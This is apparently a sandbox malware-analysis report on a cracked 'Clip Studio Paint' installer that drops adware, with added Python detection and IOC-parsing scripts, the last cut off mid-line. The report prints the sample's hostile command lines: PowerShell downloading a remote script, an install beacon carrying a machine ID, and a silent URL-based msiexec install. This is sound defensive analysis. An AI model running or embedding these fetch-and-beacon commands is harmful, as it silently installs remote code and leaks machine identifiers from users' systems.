File name: Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe

Full analysis: https://app.any.run/tasks/1300fab6-1c70-4685-a08d-a622aa367942
Verdict: Malicious activity
Threats:

Adware is a form of malware that targets users with unwanted advertisements, often disrupting their browsing experience. It typically infiltrates systems through software bundling, malicious websites, or deceptive downloads. Once installed, it may track user activity, collect sensitive data, and display intrusive ads, including pop-ups or banners. Some advanced adware variants can bypass security measures and establish persistence on devices, making removal challenging. Additionally, adware can create vulnerabilities that other malware can exploit, posing a significant risk to user privacy and system security.

Analysis date: May 25, 2024, 09:56:10
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: adware, innosetup, qrcode
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
MD5: 6FF10888FBD099D32E89AF813C280ED9
SHA1: D0E8BF6F9B47FD83035320E180F973C41CF80805
SHA256: C1C8002835E21250E8154F8ED3987241D40405B766023E392BF6540B078859FA
SSDEEP: 196608:qGTFNY3XaYjIMxtyz9aQDeAHsaiTkXnurxXb:qGhNYjjIy6ajunML

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Drops the executable file immediately after the start

      • Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe (PID: 4084)
      • mot.exe (PID: 1580)
      • set_2.exe (PID: 1596)
      • msiexec.exe (PID: 936)
  • SUSPICIOUS

    • Malware-specific behavior (creating "System.dll" in Temp)

      • Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe (PID: 4084)
    • The process creates files with name similar to system file names

      • Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe (PID: 4084)
    • Reads security settings of Internet Explorer

      • Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe (PID: 4084)
      • mot.exe (PID: 1580)
      • set_2.tmp (PID: 736)
      • msiexec.exe (PID: 936)
    • Executable content was dropped or overwritten

      • Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe (PID: 4084)
      • mot.exe (PID: 1580)
      • set_2.exe (PID: 1596)
    • Reads the Internet Settings

      • Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe (PID: 4084)
      • mot.exe (PID: 1580)
      • powershell.exe (PID: 2464)
      • powershell.exe (PID: 568)
      • set_2.tmp (PID: 736)
    • Reads settings of System Certificates

      • Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe (PID: 4084)
      • mot.exe (PID: 1580)
    • Checks Windows Trust Settings

      • Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe (PID: 4084)
      • mot.exe (PID: 1580)
      • msiexec.exe (PID: 936)
    • Creates file in the systems drive root

      • mot.exe (PID: 1580)
      • ntvdm.exe (PID: 768)
    • Unusual connection from system programs

      • powershell.exe (PID: 2464)
      • powershell.exe (PID: 568)
    • The Powershell connects to the Internet

      • powershell.exe (PID: 2464)
      • powershell.exe (PID: 568)
    • Reads the Windows owner or organization settings

      • set_2.tmp (PID: 736)
      • msiexec.exe (PID: 936)
    • The process executes Powershell scripts

      • set_2.tmp (PID: 736)
    • Starts POWERSHELL.EXE for commands execution

      • set_2.tmp (PID: 736)
    • Request a resource from the Internet using PowerShell's cmdlet

      • set_2.tmp (PID: 736)
    • Downloads file from URI

      • powershell.exe (PID: 568)
    • Adds/modifies Windows certificates

      • Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe (PID: 4084)
      • msiexec.exe (PID: 936)
  • INFO

    • Checks supported languages

      • Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe (PID: 4084)
      • set_2.exe (PID: 1596)
      • set_2.tmp (PID: 736)
      • wmpnscfg.exe (PID: 2316)
      • mot.exe (PID: 1580)
      • msiexec.exe (PID: 936)
      • msiexec.exe (PID: 1480)
    • Reads the computer name

      • Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe (PID: 4084)
      • mot.exe (PID: 1580)
      • set_2.tmp (PID: 736)
      • wmpnscfg.exe (PID: 2316)
      • msiexec.exe (PID: 936)
      • msiexec.exe (PID: 1480)
    • Checks proxy server information

      • Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe (PID: 4084)
      • mot.exe (PID: 1580)
    • Reads the machine GUID from the registry

      • Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe (PID: 4084)
      • mot.exe (PID: 1580)
      • set_2.tmp (PID: 736)
      • msiexec.exe (PID: 936)
      • msiexec.exe (PID: 1480)
    • Creates files or folders in the user directory

      • Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe (PID: 4084)
      • mot.exe (PID: 1580)
    • Create files in a temporary directory

      • Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe (PID: 4084)
      • mot.exe (PID: 1580)
      • set_2.exe (PID: 1596)
      • set_2.tmp (PID: 736)
      • msiexec.exe (PID: 936)
    • Reads the software policy settings

      • Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe (PID: 4084)
      • mot.exe (PID: 1580)
      • msiexec.exe (PID: 936)
    • Manual execution by a user

      • wmpnscfg.exe (PID: 2316)
    • Disables trace logs

      • powershell.exe (PID: 568)
      • powershell.exe (PID: 2464)
    • Application launched itself

      • msiexec.exe (PID: 936)
    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 936)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 2464)
    • Reads Internet Explorer settings

      • powershell.exe (PID: 2464)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable MS Visual C++ (generic) (67.4)
.dll | Win32 Dynamic Link Library (generic) (14.2)
.exe | Win32 Executable (generic) (9.7)
.exe | Generic Win/DOS Executable (4.3)
.exe | DOS Executable Generic (4.3)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2023:07:02 02:09:43+00:00
ImageFileCharacteristics: No relocs, Executable, No line numbers, No symbols, 32-bit
PEType: PE32
LinkerVersion: 6
CodeSize: 26624
InitializedDataSize: 139776
UninitializedDataSize: 2048
EntryPoint: 0x3645
OSVersion: 4
ImageVersion: 6
SubsystemVersion: 4
Subsystem: Windows GUI
No data.
All screenshots are available in the full report
Total processes: 55
Monitored processes: 12
Malicious processes: 5
Suspicious processes: 1

Behavior graph

Process tree as shown in the graph, reconstructed from the parent-process fields in the process information below:

start
└─ Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe (PID 4084)
   └─ mot.exe (PID 1580)
      ├─ ntvdm.exe (PID 768)
      └─ set_2.exe (PID 1596)
         └─ set_2.tmp (PID 736, no specs)
            ├─ powershell.exe (PID 568)
            ├─ powershell.exe (PID 2464)
            └─ msiexec.exe (PID 956)
services.exe
└─ msiexec.exe (PID 936)
msiexec.exe (parent recorded only by name)
└─ msiexec.exe (PID 1480)
explorer.exe
└─ wmpnscfg.exe (PID 2316, no specs)
Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe (second instance, no specs)

The graph marks two of the three msiexec.exe instances as "no specs".

Process information

Each entry below lists PID, command line, image path and parent process, followed by user, company, integrity level, description, exit code, version and the loaded modules (images) recorded for that process.
PID: 568
CMD: "powershell.exe" -command "Invoke-WebRequest -Uri https://test-js-agent.s3.amazonaws.com/event.ps1 -OutFile C:\Users\admin\AppData\Local\Temp\is-LN13S.tmp\event.ps1"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: set_2.tmp
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Windows PowerShell
Exit code: 0
Version: 10.0.14409.1005 (rs1_srvoob.161208-1155)
Note: launched by the Inno Setup stage (set_2.tmp) at high integrity; it downloads event.ps1 from an S3 bucket into an Inno Setup temp directory (is-LN13S.tmp). This is the "Downloads file from URI" signature above.
Modules (images):
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID: 736
CMD: "C:\Users\admin\AppData\Local\Temp\is-OB6LE.tmp\set_2.tmp" /SL5="$401CE,972372,832512,C:\Users\admin\AppData\Local\Temp\nstE5A1.tmp\set_2.exe" /VERYSILENT /SUPPRESSMSGBOXES /CLICKID=2632 /SOURCEID=2632
Path: C:\Users\admin\AppData\Local\Temp\is-OB6LE.tmp\set_2.tmp
Parent process: set_2.exe
User: admin
Company: Digital Pulse LLC
Integrity Level: HIGH
Description: Setup/Uninstall
Version: 51.1052.0.0
Note: the Temp\is-XXXXX.tmp\*.tmp image and the /SL5= switch are how an Inno Setup bootstrap (here set_2.exe) hands over to its unpacked setup program; /CLICKID and /SOURCEID are passed through unchanged from set_2.exe. This stage launches both powershell.exe instances and the msiexec.exe install (PID 956).
Modules (images):
c:\users\admin\appdata\local\temp\is-ob6le.tmp\set_2.tmp
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\mpr.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
PID: 768
CMD: "C:\Windows\system32\ntvdm.exe" -i1
Path: C:\Windows\System32\ntvdm.exe
Parent process: mot.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: NTVDM.EXE
Exit code: 3221225477 (0xC0000005, STATUS_ACCESS_VIOLATION)
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Note: ntvdm.exe is the host for 16-bit and DOS programs on 32-bit Windows 7; mot.exe started something that ran under NTVDM, which then crashed. The "Creates file in the systems drive root" signature above is attributed to this process.
Modules (images):
c:\windows\system32\ntvdm.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
PID: 936
CMD: C:\Windows\system32\msiexec.exe /V
Path: C:\Windows\System32\msiexec.exe
Parent process: services.exe
User: SYSTEM
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: Windows® installer
Version: 5.0.7600.16385 (win7_rtm.090713-1255)
Note: /V is the Windows Installer service instance started by services.exe (runs as SYSTEM); it is the server side of the install requested by PID 956, which is why the certificate and trust-settings signatures above are attributed to it.
Modules (images):
c:\windows\system32\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
PID: 956
CMD: "C:\Windows\System32\msiexec.exe" /I https://nodejs.org/dist/v13.14.0/node-v13.14.0-x86.msi /qn /norestart
Path: C:\Windows\System32\msiexec.exe
Parent process: set_2.tmp
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Windows® installer
Version: 5.0.7600.16385 (win7_rtm.090713-1255)
Note: a silent (/qn) install of Node.js v13.14.0 (x86) from the official nodejs.org download URL; with a URL as the package argument msiexec performs the download itself. The installer chain thus pulls a legitimate runtime onto the machine as part of its payload.
Modules (images):
c:\windows\system32\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
PID: 1480
CMD: C:\Windows\system32\MsiExec.exe -Embedding D91B3163514D07760FC0AD81DD4912F3
Path: C:\Windows\System32\msiexec.exe
Parent process: msiexec.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Windows® installer
Version: 5.0.7600.16385 (win7_rtm.090713-1255)
Note: an -Embedding instance is the custom-action server the Windows Installer service spawns in the user's context during an install.
Modules (images):
c:\windows\system32\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
PID: 1580
CMD: "C:\Users\admin\AppData\Local\Temp\nse5BC0.tmp\mot.exe"
Path: C:\Users\admin\AppData\Local\Temp\nse5BC0.tmp\mot.exe
Parent process: Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe
User: admin
Integrity Level: HIGH
Note: runs from an NSIS temp/plugin directory (ns*.tmp) created by the outer installer and carries no company or description. The waychurch.xyz and www.primeredking.click requests in the HTTP section below come from this process, and it is the parent of set_2.exe and ntvdm.exe.
Modules (images):
c:\users\admin\appdata\local\temp\nse5bc0.tmp\mot.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
PID: 1596
CMD: "C:\Users\admin\AppData\Local\Temp\nstE5A1.tmp\set_2.exe" /VERYSILENT /SUPPRESSMSGBOXES /CLICKID=2632 /SOURCEID=2632
Path: C:\Users\admin\AppData\Local\Temp\nstE5A1.tmp\set_2.exe
Parent process: mot.exe
User: admin
Company: Digital Pulse LLC
Integrity Level: HIGH
Description: DPulse Setup
Version: (none recorded)
Note: "DPulse Setup" by Digital Pulse LLC is an Inno Setup bootstrap (the innosetup tag) run fully silent; it unpacks its setup program to Temp\is-OB6LE.tmp and runs it as PID 736.
Modules (images):
c:\users\admin\appdata\local\temp\nste5a1.tmp\set_2.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.24483_none_2b200f664577e14b\comctl32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID: 2316
CMD: "C:\Program Files\Windows Media Player\wmpnscfg.exe"
Path: C:\Program Files\Windows Media Player\wmpnscfg.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Media Player Network Sharing Service Configuration Application
Exit code: 0
Version: 12.0.7600.16385 (win7_rtm.090713-1255)
Note: started from explorer.exe at medium integrity and flagged above as manual execution by a user; it is not part of the installer chain.
Modules (images):
c:\program files\windows media player\wmpnscfg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
PID: 2464
CMD: "powershell.exe" -Command "Invoke-WebRequest -Uri 'https://resolverapp.com/p?machine_id=90059c37-1320-41a4-b58d-2b75a9850d2f&publisher_id=2964&event=install&component=agent&click_id='"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: set_2.tmp
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Windows PowerShell
Exit code: 0
Version: 10.0.14409.1005 (rs1_srvoob.161208-1155)
Note: an install beacon to resolverapp.com carrying a machine_id GUID, publisher_id=2964, event=install, component=agent and an empty click_id; the response is discarded (no -OutFile), so the request exists only to report the install.
Modules (images):
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
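The parent/child and command-line fields above are enough to detect this chain without any hash. The following Python script is an added example, not part of the ANY.RUN report or of the sample: it encodes four rules a practitioner would want here (an executable running from an NSIS ns*.tmp plugin directory, an Inno Setup stage running from Temp\is-*.tmp, PowerShell making a web request on behalf of a .tmp installer stage, and msiexec installing a package straight from a URL) and runs them over a constructed copy of the process records from this report, with wmpnscfg.exe and the MSI service instance as benign controls. The record layout, rule names and severities are my own; the paths and command lines are the ones recorded above.

```python
import re
from dataclasses import dataclass


@dataclass
class Proc:
    pid: int
    image: str    # full image path
    parent: str   # parent image name, as the sandbox records it
    cmd: str      # command line


# Constructed sample: process records copied from this report (hypothetical
# record layout; the values are the ones listed under "Process information").
SAMPLE = [
    Proc(1580, r"C:\Users\admin\AppData\Local\Temp\nse5BC0.tmp\mot.exe",
         "Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe",
         r'"C:\Users\admin\AppData\Local\Temp\nse5BC0.tmp\mot.exe"'),
    Proc(1596, r"C:\Users\admin\AppData\Local\Temp\nstE5A1.tmp\set_2.exe", "mot.exe",
         r'"C:\Users\admin\AppData\Local\Temp\nstE5A1.tmp\set_2.exe" '
         r'/VERYSILENT /SUPPRESSMSGBOXES /CLICKID=2632 /SOURCEID=2632'),
    Proc(736, r"C:\Users\admin\AppData\Local\Temp\is-OB6LE.tmp\set_2.tmp", "set_2.exe",
         r'"C:\Users\admin\AppData\Local\Temp\is-OB6LE.tmp\set_2.tmp" '
         r'/SL5="$401CE,972372,832512,C:\Users\admin\AppData\Local\Temp\nstE5A1.tmp\set_2.exe" '
         r'/VERYSILENT /SUPPRESSMSGBOXES /CLICKID=2632 /SOURCEID=2632'),
    Proc(568, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "set_2.tmp",
         r'"powershell.exe" -command "Invoke-WebRequest -Uri '
         r'https://test-js-agent.s3.amazonaws.com/event.ps1 '
         r'-OutFile C:\Users\admin\AppData\Local\Temp\is-LN13S.tmp\event.ps1"'),
    Proc(2464, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "set_2.tmp",
         '"powershell.exe" -Command "Invoke-WebRequest -Uri '
         "'https://resolverapp.com/p?machine_id=90059c37-1320-41a4-b58d-2b75a9850d2f"
         "&publisher_id=2964&event=install&component=agent&click_id='\""),
    Proc(956, r"C:\Windows\System32\msiexec.exe", "set_2.tmp",
         r'"C:\Windows\System32\msiexec.exe" /I '
         r'https://nodejs.org/dist/v13.14.0/node-v13.14.0-x86.msi /qn /norestart'),
    Proc(936, r"C:\Windows\System32\msiexec.exe", "services.exe",
         r"C:\Windows\system32\msiexec.exe /V"),
    Proc(2316, r"C:\Program Files\Windows Media Player\wmpnscfg.exe", "explorer.exe",
         r'"C:\Program Files\Windows Media Player\wmpnscfg.exe"'),
]

# Directory patterns the two installer toolchains use for their temp stages.
NSIS_PLUGIN_DIR = re.compile(r"\\Temp\\ns[a-z0-9]{4,}\.tmp\\", re.I)
INNO_STAGE = re.compile(r"\\Temp\\is-[a-z0-9]+\.tmp\\[^\\]+\.tmp$", re.I)
PS_WEB_CMDLET = re.compile(
    r"invoke-webrequest|invoke-restmethod|\biwr\b|downloadfile|downloadstring", re.I)
MSI_FROM_URL = re.compile(r"/i\s+[\"']?https?://", re.I)
URL = re.compile(r"https?://[^\s\"']+")


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(procs):
    """Return (pid, rule, severity) tuples for every record that trips a rule."""
    findings = []
    for p in procs:
        name = image_name(p.image)
        if NSIS_PLUGIN_DIR.search(p.image):
            findings.append((p.pid, "exe_from_nsis_temp_dir", "high"))
        if INNO_STAGE.search(p.image):
            findings.append((p.pid, "inno_setup_stage_in_temp", "medium"))
        if name == "powershell.exe" and PS_WEB_CMDLET.search(p.cmd):
            # PowerShell reaching out on behalf of an installer stage (parent *.tmp)
            # is the combination seen in this report; a user's own shell rates lower.
            severity = "high" if p.parent.lower().endswith(".tmp") else "medium"
            findings.append((p.pid, "powershell_web_request", severity))
        if name == "msiexec.exe" and MSI_FROM_URL.search(p.cmd):
            findings.append((p.pid, "msiexec_install_from_url", "high"))
    return findings


def urls_from_cmdlines(procs):
    """Network IOCs embedded in command lines, for the blocklist or hunt query."""
    return sorted({u for p in procs for u in URL.findall(p.cmd)})


if __name__ == "__main__":
    for pid, rule, sev in evaluate(SAMPLE):
        print(f"{sev:6} PID {pid:<5} {rule}")
    print("URLs:", *urls_from_cmdlines(SAMPLE), sep="\n  ")
```

Run against the sample, the rules fire on mot.exe, set_2.exe, set_2.tmp, both powershell.exe instances and the msiexec.exe /I instance, and on nothing else; the URL extraction yields the S3 script, the resolverapp.com beacon and the nodejs.org MSI. In a real telemetry source the parent would be a PID rather than a name, which makes the "installer stage spawned PowerShell" rule stricter still.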
Total events: 47 173
Read events: 42 320
Write events: 4 824
Delete events: 29

Modification events

All by PID 4084 (Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe):

Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
  write         ProxyEnable = 0
  delete value  ProxyServer
  delete value  ProxyOverride
  delete value  AutoConfigURL
  delete value  AutoDetect
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
  write         SavedLegacySettings = 460000005D010000090000000000000000000000000000000400000000000000C0E333BBEAB1D3010000000000000000000000000100000002000000C0A8016B000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
  write         ProxyBypass = 1
  write         IntranetName = 1
  write         UNCAsIntranet = 1
  write         AutoDetect = 0

Taken together these writes remove any manual proxy, PAC script URL and auto-detect setting for the current user and rewrite the saved WinINet connection settings, which is consistent with an installer making sure its own WinINet downloads (the NSIS Inetc plugin) are not routed through a configured proxy.
Executable files: 27
Suspicious files: 1 089
Text files: 2 180
Unknown types: 5

Dropped files

PID | Process | File (type), with MD5 and SHA256

4084 | Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 (compressed)
  MD5: 29F65BA8E88C063813CC50A4EA544E93
  SHA256: 1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
4084 | Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe | C:\Users\admin\AppData\Local\Temp\nse5BC0.tmp\rty (text)
  MD5: B1B15DF059C50EE5B915A3472BE584D3
  SHA256: 8B3E8E21C882A7FA59033ABF5A356D8202BB61200411BFE32F64151FC625EFA1
4084 | Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 (binary)
  MD5: 199EB7BDAFBAEA2C5305B1927C6D69C7
  SHA256: DCE86435CC3613D817BA55BBAE4AE9BFBE4ECA8230374A60A38D592FA5036247
4084 | Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\arpk[1].htm (text)
  MD5: B1B15DF059C50EE5B915A3472BE584D3
  SHA256: 8B3E8E21C882A7FA59033ABF5A356D8202BB61200411BFE32F64151FC625EFA1
4084 | Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 (binary)
  MD5: 80E5AB18ECAFD7E3AE595672A2BD0627
  SHA256: F58A30A4077E85F30F0A0E44E49135DA4CAABF6A03CFB79B0989E26958A44B57
4084 | Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe | C:\Users\admin\AppData\Local\Temp\nse5BC0.tmp\INetC.dll (executable)
  MD5: 40D7ECA32B2F4D29DB98715DD45BFAC5
  SHA256: 85E03805F90F72257DD41BFDAA186237218BBB0EC410AD3B6576A88EA11DCCB9
4084 | Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe | C:\Users\admin\AppData\Local\Temp\Tar89A8.tmp (cat)
  MD5: 435A9AC180383F9FA094131B173A2F7B
  SHA256: 67DC37ED50B8E63272B49A254A6039EE225974F1D767BB83EB1FD80E759A7C34
4084 | Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1B1495DD322A24490E2BF2FAABAE1C61 (binary)
  MD5: 5AE8478AF8DD6EEC7AD4EDF162DD3DF1
  SHA256: FE42AC92EAE3B2850370B73C3691CCF394C23AB6133DE39F1697A6EBAC4BEDCA
4084 | Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe | C:\Users\admin\AppData\Local\Temp\Cab89A7.tmp (compressed)
  MD5: 29F65BA8E88C063813CC50A4EA544E93
  SHA256: 1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
1580 | mot.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PO2HN1X2\star[1].php (text)
  MD5: 444BCB3A3FCF8389296C49467F27E1D6
  SHA256: 2689367B205C16CE32ED4200942B8B8B1E262DFC70D9BC9FBC77C49699A4F1DF

Two pairs share hashes: nse5BC0.tmp\rty and the IE-cache copy arpk[1].htm are the same content (the response to the dollshands.icu arpk.php request, saved into the NSIS temp directory), and Cab89A7.tmp is the same file as the CryptnetUrlCache content 77EC63BDA74BD0D0E0426DC8F8008506 (the authroot CTL cabinet fetched from ctldl.windowsupdate.com). INetC.dll in the same NSIS directory is the NSIS Inetc download plugin, which matches the NSIS_Inetc user agent flagged in the Threats section.
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 13
TCP/UDP connections: 17
DNS requests: 15
Threats: 9

HTTP requests

PID | Process | Method | HTTP code | IP:port | URL (the CN and reputation fields were reported as "unknown" for every request)

4084 | Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe | GET | 304 | 23.219.78.213:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?173dfc45889b84bc
4084 | Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe | GET | 200 | 172.67.145.207:80 | http://dollshands.icu/arpk.php?pe=n&p=3915&t=49615566&title=Q2xpcCBTdHVkaW8gUGFpbnQgNS45LjEwICsgTWF0ZXJpYWxzIC0gUDJQICsgQ3JhY2s=&sub=
4084 | Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe | GET | 200 | 23.219.78.213:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?0fd705b4979870b9
4084 | Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe | GET | 200 | 23.218.185.6:80 | http://x2.c.lencr.org/
4084 | Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe | GET | 200 | 23.218.185.6:80 | http://x1.c.lencr.org/
1580 | mot.exe | GET | 200 | 188.114.97.3:80 | http://waychurch.xyz/lod.php?fz=&d=nsis&msg=&r=offer_exists&ko=no&o=1662&a=2632&dn=420&spot=1&t=1716631000
1580 | mot.exe | GET | 200 | 23.106.59.52:80 | http://www.primeredking.click/ping/?count=true&id=55ghm2fide1
1580 | mot.exe | GET | 302 | 188.114.97.3:80 | http://waychurch.xyz/dol.php?paw=433835&spot=2&a=2632&on=310&o=365
1580 | mot.exe | GET | 302 | 188.114.97.3:80 | http://waychurch.xyz/dol.php?paw=964334&spot=3&a=2632&on=416&o=1658
1580 | mot.exe | GET | 200 | 108.138.2.10:80 | http://o.ss2.us//MEowSDBGMEQwQjAJBgUrDgMCGgUABBSLwZ6EW5gdYc9UaSEaaLjjETNtkAQUv1%2B30c7dH4b0W1Ws3NcQwg6piOcCCQCnDkpMNIK3fw%3D%3D

The ctldl.windowsupdate.com, x1/x2.c.lencr.org (Let's Encrypt issuer certificate) and o.ss2.us (an OCSP request carried in the URL path) requests are Windows certificate-chain housekeeping triggered by the HTTPS connections. The dollshands.icu, waychurch.xyz and www.primeredking.click requests are the installer's own tracking calls: the base64 title= parameter of arpk.php decodes to the sample's own file name ("Clip Studio Paint 5.9.10 + Materials - P2P + Crack"), d=nsis and r=offer_exists describe the stage that is calling home, and a=2632 is the same value passed to set_2.exe as /CLICKID and /SOURCEID.
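The tracking URLs above and the beacon in the PID 2464 command line carry the campaign's identifiers in the query string. The following Python script is an added example, not part of the ANY.RUN report: it splits those URLs into parameters, decodes base64 text values and Unix-timestamp-looking values, and then looks for numeric tokens that recur across the independent artefacts, which is how the affiliate id tying the NSIS stage to the Inno Setup stage surfaces. The URLs and the set_2.exe command line are copied from this report; the function names, the 8-character minimum for base64 candidates and the 2017 to 2033 timestamp window are my own choices.

```python
import base64
import re
from datetime import datetime, timezone
from urllib.parse import parse_qs, urlsplit

# Artefacts copied from this report: tracking URLs from the HTTP requests table,
# the beacon from the powershell.exe (PID 2464) command line and the set_2.exe
# (PID 1596) command line.
ARPK_URL = ("http://dollshands.icu/arpk.php?pe=n&p=3915&t=49615566"
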